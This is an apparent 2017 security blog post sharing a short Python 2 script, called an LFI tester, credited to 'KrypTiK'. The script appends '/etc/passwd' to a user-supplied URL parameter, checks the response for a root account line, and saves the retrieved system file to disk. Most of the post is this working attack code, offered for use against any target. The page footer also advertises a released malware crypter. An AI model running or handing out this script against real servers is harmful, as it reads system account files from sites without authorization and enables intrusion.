Friday, June 16, 2017
Home / Programming / Python LFI Tester

Python LFI Tester

A small script that tests for LFI or local files inclusion vulnerability.  This script is written in Python.

Written by: KrypTiK

#!/usr/bin/python # -*- coding: utf-8 -*- # Made By KrypTiK import httplib2 import urllib2 import sys import re print "Ex. http://127.0.0.1/index.php?page=" baseurl = raw_input("Enter a url: ") if 'http://' not in baseurl: baseurl = 'http://' + baseurl url = baseurl+"/etc/passwd" fout = raw_input("Enter output file: ") http = httplib2.Http() req = urllib2.Request(url) try: http.request(url) except IOError: print "URL not found!" sys.exit() else: pass response, content = http.request(url) if response.status == 200: if re.search("/root:/bin/bash",content): print baseurl+" is vulnerable! (Linux)" out = open(fout, "w") out.write(url+"\n\n"+urllib2.urlopen(req).read()) out.close() else: print baseurl+" is not vulnerable!" elif response.status == 404: print baseurl+" was not found!" else: print response.status

About FastFlux

Owner of ZeroSecurity, interested in programming, malware analysis and penetration testing. If you would like to write for the ZeroSecurity team, please use the contact form above.

Check Also

iCrypt v1.3 Source Released

ACiiiD from a popular malware programming forum, Opensc.ws, has released a crypter project that was started …